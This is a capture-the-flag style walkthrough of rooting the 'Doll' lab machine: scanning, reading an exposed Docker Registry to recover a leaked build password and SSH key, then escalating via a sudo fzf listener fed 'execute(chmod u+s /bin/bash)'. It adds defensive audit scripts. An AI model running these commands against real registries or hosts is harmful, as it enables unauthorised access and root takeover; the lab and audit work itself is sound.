Penetrating the Doll target machine
Ms08067 summer class, day one: penetrating the target machine Doll
Recall the pentest workflow: information gathering -> vulnerability scanning -> exploitation -> privilege escalation -> persistence
Starting the penetration test
Scan the network with nmap. From ifconfig we know that our own (attacker) machine's IP is 192.168.47.139; the target's IP is 192.168.47.148.
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# nmap 192.168.47.0/24
Nmap scan report for 192.168.47.148
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
1007/tcp open unknown
MAC Address: 00:0C:29:DF:E2:AC (VMware)
Nmap scan report for 192.168.47.139
Host is up (0.0000050s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Now that we know the open ports, run a version scan to find out what services these ports are running.
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# nmap -sV -p22,1007 192.168.47.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:56 EDT
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 21:57 (0:00:21 remaining)
Nmap scan report for 192.168.47.148
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
1007/tcp open http Docker Registry (API: 2.0)
MAC Address: 00:0C:29:DF:E2:AC (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.55 seconds
Gather some information first. Having identified what port 1007 is, a Baidu search for "Docker Registry (API: 2.0)" explains it; visiting the port in a browser shows a blank page.
The Docker Registry API V2 provides a set of RESTful APIs for interacting with a Docker image repository. These APIs let users push, pull and delete images. Some commonly used endpoints and how to use them follow.
Run a directory scan with dirsearch: dirsearch -u http://192.168.47.148:1007/. It finds two paths, /v2 and /v2/_catalog; /v2/_catalog lists all repositories.
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# dirsearch -u http://192.168.47.148:1007/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_192.168.47.148_1007/__25-07-13_22-02-13.txt

Target: http://192.168.47.148:1007/

[22:02:13] Starting:
[22:02:13] 301 - 0B - /%2e%2e//google.com -> /google.com
[22:02:13] 301 - 0B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -> /etc/passwd
[22:02:22] 301 - 0B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[22:02:22] 301 - 0B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[22:02:22] 301 - 0B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[22:02:23] 301 - 0B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -> /etc/passwd
[22:02:23] 301 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[22:02:26] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[22:02:26] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[22:02:27] 301 - 0B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[22:02:28] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[22:02:43] 301 - 39B - /v2 -> /v2/
[22:02:43] 200 - 2B - /v2/
[22:02:43] 200 - 27B - /v2/_catalog

Task Completed
Visit /v2/ (the 200 response) to look for anything usable; it is empty. Then visit /v2/_catalog, which lists all repositories, and find the dolly repository. Visiting /v2/dolly in the browser returns a 404.
Fetch the image tag list with curl http://192.168.47.148:1007/v2/dolly/tags/list (the first attempt, without the :1007 port, failed); the returned tag list contains latest.
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# curl http://192.168.47.148:1007/v2/dolly/tags/list
{"name":"dolly","tags":["latest"]}
Fetch the image manifest with curl http://192.168.47.148:1007/v2/dolly/manifests/latest. The history section contains sensitive information such as name, passwd and so on.
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# curl http://192.168.47.148:1007/v2/dolly/manifests/latest
{"schemaVersion": 1,"name": "dolly","tag": "latest","architecture": "amd64",
"fsLayers": [{"blobSum": "sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017"},{"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"},{"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"},{"blobSum": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09"}],
"history": [
{"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"10ddd4608cdf\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"Image\":\"doll\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"10ddd4608cdfd81cd95111ecfa37499635f430b614fa326a6526eef17a215f06\",\"container_config\":{\"Hostname\":\"10ddd4608cdf\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"Image\":\"doll\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2023-04-25T08:58:11.460540528Z\",\"docker_version\":\"23.0.4\",\"id\":\"89cefe32583c18fc5d6e6a5ffc138147094daac30a593800fe5b6615f2d34fd6\",\"os\":\"linux\",\"parent\":\"1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\"}"},
{"v1Compatibility": "{\"id\":\"1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\",\"parent\":\"638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\",\"comment\":\"buildkit.dockerfile.v0\",\"created\":\"2023-03-29T18:19:24.45578926Z\",\"container_config\":{\"Cmd\":[\"ARG passwd=devilcollectsit\"]},\"throwaway\":true}"},
{"v1Compatibility": "{\"id\":\"638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\",\"parent\":\"cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\",\"created\":\"2023-03-29T18:19:24.45578926Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"},
{"v1Compatibility": "{\"id\":\"cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\",\"created\":\"2023-03-29T18:19:24.348438709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:9a4f77dfaba7fd2aa78186e4ef0e7486ad55101cefc1fabbc1b385601bb38920 in / \"]}}"}],
"signatures": [{"header": {"jwk": {"crv": "P-256","kid": "TBHC:2ZQV:4NEZ:276S:BTKG:CNKA:SCBO:2BFG:GHAA:L62S:RXHZ:NJV4","kty": "EC","x": "EEkEcC8lZj84RLqmKK4up7vZTq-TAl8oDsvPngkmVb0","y": "-Zl9c1VCVQfRhut44GHSHHZMW4ME08AQJVpl1P_4WRM"},"alg": "ES256"},"signature": "bpOWxNLpEwmr7GNdJ57RXWiJv6qF1J05Lw0SwCIXlbSMFInKfzejyi_SbW3xrY4zcaDmqS4H30_byFlgz34ZLQ","protected": "eyJmb3JtYXRMZW5ndGgiOjI4MjksImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyNS0wNy0xNFQwMjowODo0N1oifQ"}]
}
Run curl http://192.168.47.148:1007/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 -o blob.tar to download the image layer file.
┌──(root㉿Xudde)-[/home/kali/Desktop]
└─# curl http://192.168.47.148:1007/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 -o blob.tar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3707 100 3707 0 0 752k 0 --:--:-- --:--:-- --:--:-- 905k
Extract the downloaded file with tar -xf blob.tar.
Inside are /root, /home and /etc directories. Go in and gather information: first, in root, ls -al reveals the .bash_history command-history file, which shows that a user bela was created. Then, in the /etc directory, ls -al reveals configuration files; look through them.
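The registry walk above (catalog -> tags -> manifest -> blob -> extracted layer) is exactly what an auditor should run against their own registries before an attacker does. The Python script below is an added example, not code from the original write-up: it parses a schemaVersion-1 manifest and flags ARG/ENV build steps whose key looks like a credential (the "ARG passwd=..." pattern seen in the history), lists the unique layer digests that would have to be pulled, and lists credential-bearing paths inside a layer tarball. The manifest and tarball are constructed inside the script with placeholder values; fetch_manifest is an assumed helper for a plain-HTTP, unauthenticated registry and is not used by the offline checks.

```python
"""Audit a Docker Registry v2 image for leaked build secrets (added example).

Mirrors the walkthrough from an audit angle:
  1. parse a schemaVersion-1 manifest and flag ARG/ENV build steps in the
     history whose key looks like a credential (the "ARG passwd=..." case);
  2. list the unique layer digests that would have to be pulled;
  3. list files in a downloaded layer tarball that commonly hold credentials.
The manifest and tarball below are constructed test data, not the real
registry's content. fetch_manifest is an assumed helper for a plain-HTTP,
unauthenticated registry and is not called by the offline checks.
"""
import io
import json
import re
import tarfile
import urllib.request

# Build-argument / environment keys that should never appear in image history.
SECRET_KEY_RE = re.compile(r"passw(or)?d|secret|token|api[_-]?key|private[_-]?key", re.I)
# History commands look like "ARG k=v" or "/bin/sh -c #(nop)  ENV k=v".
BUILD_STEP_RE = re.compile(r"\s*(?:/bin/sh -c #\(nop\)\s*)?(ARG|ENV)\s+(\w+)=(\S+)")
# Paths inside a layer worth flagging (layer tars omit the leading '/').
SENSITIVE_PATH_RE = re.compile(r"^(root|home/[^/]+)/(\.ssh/|\.bash_history$)|^etc/shadow$")


def find_history_secrets(manifest: dict) -> list:
    """Return (layer_id, key, value) for credential-like ARG/ENV build steps."""
    hits = []
    for entry in manifest.get("history", []):
        compat = json.loads(entry["v1Compatibility"])
        for cmd in compat.get("container_config", {}).get("Cmd") or []:
            m = BUILD_STEP_RE.match(cmd)
            if m and SECRET_KEY_RE.search(m.group(2)):
                hits.append((compat.get("id", "?")[:12], m.group(2), m.group(3)))
    return hits


def layer_digests(manifest: dict) -> list:
    """fsLayers is listed top layer first; drop duplicate (empty) layers."""
    seen, out = set(), []
    for layer in manifest.get("fsLayers", []):
        digest = layer["blobSum"]
        if digest not in seen:
            seen.add(digest)
            out.append(digest)
    return out


def sensitive_files_in_layer(tar_bytes: bytes) -> list:
    """List regular files in a layer tar whose path matches SENSITIVE_PATH_RE."""
    found = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for member in tf.getmembers():
            name = re.sub(r"^\.?/", "", member.name)  # normalise "./x" and "/x" to "x"
            if member.isfile() and SENSITIVE_PATH_RE.search(name):
                found.append(name)
    return found


def fetch_manifest(registry: str, repo: str, tag: str = "latest") -> dict:
    """Assumed helper: GET /v2/<repo>/manifests/<tag> from an unauthenticated registry."""
    with urllib.request.urlopen(f"{registry}/v2/{repo}/manifests/{tag}") as resp:
        return json.loads(resp.read())


# --- constructed test data (placeholder values, not the real image) ---
def _compat(layer_id: str, cmd: str, **extra) -> dict:
    return {"v1Compatibility": json.dumps(
        {"id": layer_id, "container_config": {"Cmd": [cmd]}, **extra})}


CONSTRUCTED_MANIFEST = {
    "schemaVersion": 1, "name": "example", "tag": "latest",
    "fsLayers": [{"blobSum": "sha256:" + "aa" * 32},
                 {"blobSum": "sha256:" + "bb" * 32},
                 {"blobSum": "sha256:" + "bb" * 32}],
    "history": [
        _compat("1" * 16, "/bin/sh"),
        _compat("2" * 16, "ARG passwd=PLACEHOLDER_BUILD_SECRET", throwaway=True),
        _compat("3" * 16, "/bin/sh -c #(nop)  ENV API_TOKEN=PLACEHOLDER_TOKEN"),
        _compat("4" * 16, '/bin/sh -c #(nop) CMD ["/bin/sh"]'),
    ],
}


def build_constructed_layer() -> bytes:
    """In-memory stand-in for blob.tar with a few representative files."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, data in [
            ("./home/bela/.ssh/id_rsa", b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n"),
            ("./root/.bash_history", b"useradd -m bela\n"),
            ("./etc/hostname", b"doll\n"),
            ("./usr/bin/true", b"\x7fELF"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for layer_id, key, value in find_history_secrets(CONSTRUCTED_MANIFEST):
        print(f"secret in layer {layer_id}: {key}={value}")
    print("layers to pull:", layer_digests(CONSTRUCTED_MANIFEST))
    print("sensitive files:", sensitive_files_in_layer(build_constructed_layer()))
```

The history check is the important one: a build ARG that carried a password is preserved in the image metadata even though the layer it produced is marked throwaway, so the manifest alone is enough to leak it. The fix on the registry side is to require authentication (or at least not expose the registry on the network), and on the build side to pass secrets through BuildKit secret mounts rather than ARG/ENV.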
ssh bela@192.168.47.148 -i id_rsa, entering the passphrase devilcollectsit, connects successfully.
┌──(root㉿Xudde)-[/home/…/Desktop/home/bela/.ssh]
└─# ssh bela@192.168.47.148 -i id_rsa
The authenticity of host '192.168.47.148 (192.168.47.148)' can't be established.
ED25519 key fingerprint is SHA256:HWsmY0zUYHV1M+0fOxSA4gbKv2xMIbJUGpnQgV+Tuvg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.47.148' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux doll 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 25 10:35:13 2023 from 192.168.0.100
bela@doll:~$
Check the sudo configuration with sudo -l
bela@doll:~$ sudo -l
Matching Defaults entries for bela on doll:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bela may run the following commands on doll:
    (ALL) NOPASSWD: /usr/bin/fzf --listen\=1337
Run sudo /usr/bin/fzf --listen=1337 to start fzf's HTTP listener on port 1337 as root.
bela@doll:/$ sudo /usr/bin/fzf --listen\=1337
Method one: from another terminal run curl -X POST --data 'execute(chmod u+s /bin/bash)' http://127.0.0.1:1337, which sets the setuid bit on /bin/bash.
┌──(root㉿Xudde)-[/home/…/Desktop/home/bela/.ssh]
└─# curl -X POST --data 'execute(chmod u+s /bin/bash)' http://192.168.47.148:1337
Method two: if that does not work, open a second SSH session and run curl -X POST --data 'execute(chmod u+s /bin/bash)' http://127.0.0.1:1337 there, which sets the setuid bit on /bin/bash.
bela@doll:/tmp$ curl -X POST --data 'execute(chmod u+s /bin/bash)' http://127.0.0.1:1337
Escalate privileges with /bin/bash -p
bela@doll:/tmp$ /bin/bash -p
bash-5.1# id
uid=1000(bela) gid=1000(bela) euid=0(root) grupos=1000(bela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
bash-5.1#
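From the defender's side, the escalation above depends on two things that a host audit can catch: a sudoers NOPASSWD rule that lets an unprivileged user start a root-owned network listener, and a shell binary left with the setuid bit afterwards. The Python script below is an added example, not from the original write-up: it extracts NOPASSWD rules from sudo -l output and flags the ones that pass a --listen argument, and walks a directory tree for setuid shells. The sudo -l text and the directory tree it checks are constructed inside the script.

```python
"""Host-side checks for the two conditions the privilege escalation relies on
(added example, not from the original write-up): a sudoers NOPASSWD rule that
lets a user start a root-owned network listener, and a shell binary left with
the setuid bit. The sudo -l text and the directory tree are constructed.
"""
import os
import re
import stat
import tempfile

SHELL_NAMES = {"bash", "sh", "dash", "zsh", "ksh"}
# "(runas) NOPASSWD: command" as printed by sudo -l, one rule per line.
NOPASSWD_RE = re.compile(r"\(([^)]*)\)\s*NOPASSWD:\s*(.+)")


def nopasswd_rules(sudo_l_output: str) -> list:
    """Extract (runas, command) pairs for every NOPASSWD rule in sudo -l output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = NOPASSWD_RE.search(line)
        if m:
            rules.append((m.group(1).strip(), m.group(2).strip()))
    return rules


def listener_rules(rules: list) -> list:
    """Heuristic: a NOPASSWD command told to listen on a socket can be driven over
    loopback by any local user, so the rule grants far more than the binary suggests."""
    return [(runas, cmd) for runas, cmd in rules if "--listen" in cmd]


def find_setuid_shells(root: str) -> list:
    """Walk root; return root-relative regular files named like a shell with setuid set."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks while auditing
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and fname in SHELL_NAMES:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


# --- constructed inputs ---
# Modelled on the sudo -l output in the write-up, plus one harmless rule.
CONSTRUCTED_SUDO_L = """\
Matching Defaults entries for bela on doll:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User bela may run the following commands on doll:
    (ALL) NOPASSWD: /usr/bin/fzf --listen\\=1337
    (root) /usr/bin/apt-get
"""


def make_constructed_tree() -> str:
    """Create a temp directory with bin/bash (setuid) and bin/ls (normal); return its path."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.makedirs(os.path.join(root, "bin"))
    for name, mode in (("bash", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, "bin", name)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")  # placeholder content, not a real binary
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    found = nopasswd_rules(CONSTRUCTED_SUDO_L)
    print("NOPASSWD rules:", found)
    print("rules that open a listener:", listener_rules(found))
    tree = make_constructed_tree()
    print("setuid shells under", tree, ":", find_setuid_shells(tree))
```

On a real host the same find_setuid_shells walk over / (or a periodic `find / -perm -4000` compared against a known baseline) is what surfaces the chmod u+s /bin/bash artefact left behind by this technique; the sudoers rule itself is the root cause and should be removed or restricted to a command that cannot execute arbitrary input.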
Root privileges obtained.
To sum up the workflow of this penetration test: nmap host discovery -> nmap port scan of the target -> information gathering on the open ports -> inspect the web page -> dirsearch web directory scan -> use the gathered information -> list all repositories via the web API -> request the image tag list -> request the image manifest -> collect sensitive information and obtain passwd -> request the image layer file -> inspect the files for sensitive information -> log in as bela with the sensitive information -> check sudo privileges after login -> escalate privileges using the sudo rule -> escalation succeeds and full root is obtained